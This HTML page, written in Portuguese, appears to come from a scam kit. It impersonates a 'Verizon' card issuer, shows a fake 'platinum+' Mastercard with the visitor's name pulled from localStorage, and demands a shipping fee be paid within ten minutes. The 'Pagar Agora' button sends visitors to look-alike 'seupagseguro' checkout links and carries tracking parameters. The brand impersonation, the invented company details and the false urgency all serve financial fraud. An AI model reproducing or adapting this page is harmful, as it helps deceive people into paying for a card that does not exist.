<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verizon - Faça seu Cartão</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/style.css">
    
<script src="js/latest.js" async="" defer=""></script>

<script>
  window.pixelId = "66bb763debbcebab27d68442";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
    
</head><body>
    <link rel="stylesheet" href="css/style.css">
    <style>
        html, body {
            height: 100%;
            margin: 0;
            display: flex;
            flex-direction: column;
        }
        .main-content {
            flex: 1; /* Faz com que a main-content cresça para ocupar o espaço disponível */
            max-width: 400px;
            margin: 40px auto 30px auto;
            padding: 20px;
            background-color: #fff;
            border-radius: 20px;
        }

        .char {
            background-color: #e6007e;
        }


        /* .footer {
            background-color: #e6007e;
            color: white;
            padding: 10px 20px;
            text-align: center;
            border-top: 1px solid #ddd;
            width: 100%;
            position: relative;
        } */
        /* .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            padding: 10px 0;
            position: fixed;
            width: 100%;
            position: relative;
        } */
       .card-wrapper {
            max-width: 400px;
            margin: 0 auto;
            text-align: center;
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            font-family: Arial, sans-serif;
        }

        .card-credit {
            background: linear-gradient(135deg, #3b3b3b, #141a1a);
            border-radius: 15px;
            padding: 20px;
            color: #fff;
            box-shadow: 0px 8px 16px #0003;
            position: relative;
            height: 200px;
            max-width: 350px;
            margin: 0 auto;
        }

        .card-details {
            position: relative;
            width: 100%;
            height: 100%;
        }

        .bank-name {
            font-size: 18px;
            font-weight: bold;
            text-align: left;
            margin-bottom: 10px;
        }

        .chip {
            position: absolute;
            top: 23px;
            left: 0px;
            width: 40px;
            display: flex;
            align-items: center;
        }

        .chip img {
            /* width: 100%;  */
            height: auto;
            width: 30px; /* Ajuste o tamanho do chip */
            margin-right: 5px; /* Espaço entre o chip e o NFC */
        }

        .nfc {
            position: absolute;
            top: 20px;
            right: 20px;
            width: 30px;
        }

        .nfc-img {
            width: 20px;
        }

        .card-number {
            font-size: 16px;
            letter-spacing: 2px;
            margin-top: 49px;
            text-align: left;
        }

        .valid-thru {
            font-size: 12px;
            text-align: left;
            margin-top: 10px;
        }

        .name-info {
            font-size: 14px;
            text-align: left;
            margin-top: 5px;
        }

        .platinum {
            position: absolute;
            top: 2px;
            right: 20px;
        }

        .mastercard {
            position: absolute;
            bottom: 20px;
            right: 20px;
            width: 50px;
        }

        .mastercard img {
            width: 100%; /* Garantir que a imagem da Mastercard ocupe todo o contêiner sem distorcer */
            height: auto;
        }

        .btn-primary {
            background-color: #e6007e;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            margin-top: 20px;
        }

        .btn-primary:hover {
            background-color: #c20068;
        }



    </style>

<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">   
    <div class="header">
        <img style="width: 160px;" src="images/VfoPzxB.png" alt="Imagem Centralizada"> 
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 40px;" class="main-content">
        <!-- <div class="card-wrapper"> -->
            <div class="card-credit">
                <div class="card-details">
                    <div class="bank-name">Verizon</div>
                    <div class="platinum">platinum+</div>
                    <div class="chip mt-3">
                        <img src="images/9334627.png" alt="Chip do cartão" class="chip-img">
                        <img src="images/connection-nfc.svg" alt="NFC" class="nfc-img">
                    </div>
                    <div class="nfc">
                    </div>
                    <div class="card-number">5318 39XX XXXX XXXX</div>
                    <div class="valid-thru">VALIDADE 07/31</div>
                    <div class="name-info" style="position: relative;font-weight: bold;font-size: 16px;" id="nomeCartao">Albertino Carvalho</div> 
                    <div class="mastercard">
                        <img src="images/8b1cc0c7-5e15-4589-8ee6-efa6016a75ce.png" alt="Mastercard Logo">
                    </div>
                </div>
            </div>
            <div class="mt-2">
                <p class="text-start">O Cartão Virtual será enviado com as seguintes condições:</p>
                <p class="text-start"><strong>Necessário concluir o pagamento do envio em até 10 minutos.</strong></p>
                <p class="text-start">Após a aprovação, o sistema enviará automaticamente para o WhatsApp cadastrado.</p>
                <button type="button" id="botaoPagar" class="btn btn-custom rounded-pill pagando">Pagar Agora</button>
            </div>
        <!-- </div> -->
    
        </div>
    </div>    

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            const dadosUsuario = JSON.parse(localStorage.getItem('dadosUsuarioUni'));
            if (dadosUsuario && dadosUsuario.nome) {
                const nomeCompleto = dadosUsuario.nome.split(' ');
                const primeiroNome = nomeCompleto[0];
                const ultimoNome = nomeCompleto[nomeCompleto.length - 1];
                const nomeParaMostrar = `${primeiroNome} ${ultimoNome}`;
                document.getElementById('nomeCartao').textContent = nomeParaMostrar;
            } else {
                console.error('Nome do usuário não encontrado no localStorage.');
            }
        });
    </script>
    <script>
        
document.getElementById('botaoPagar').addEventListener('click', function() {
    // Recupera a modalidade de envio do localStorage
    const freteEscolhido = localStorage.getItem('freteEscolhido');

    // Função para recuperar os parâmetros UTM e anexá-los à URL
    function appendUTMParamsToUrl(url) {
        const utmParams = JSON.parse(localStorage.getItem('utmParams'));
        if (utmParams) {
            const params = new URLSearchParams(utmParams);
            return url + '?' + params.toString();
        } else {
            return url; // Se não houver parâmetros UTM, retorna a URL original
        }
    }

    // Verifica qual modalidade foi escolhida e redireciona para o link correto
    if (freteEscolhido) {
        let checkoutUrl;
        if (freteEscolhido === 'sedex') {
            checkoutUrl = 'https://pay.seupagseguro.com/checkout/64d97d94-6b7c-423f-a02b-e7139c3ded8d'; // Link de pagamento do SEDEX
        } else if (freteEscolhido === 'pac') {
            checkoutUrl = 'https://pay.seupagseguro.com/checkout/9c468454-0bfb-43d4-9bff-86a1378aee8f'; // Link de pagamento do PAC
        } else {
            alert('Erro: Modalidade de envio desconhecida.');
            return;
        }

        // Adiciona os parâmetros UTM armazenados à URL de checkout
        window.location.href = appendUTMParamsToUrl(checkoutUrl);
    } else {
        alert('Erro: Nenhuma modalidade de envio selecionada.');
    }
});

        
    </script>
    

    <div class="footer py-4" id="footerChg">
        © 2024 Verizon S/A. CNPJ 68.694.585/0001-20. <br>
        Av. Brig. Faria Lima, 1811, São Paulo/SP
    </div>

    <script src="js/bootstrap.bundle.min.js"></script>




</div></body></html>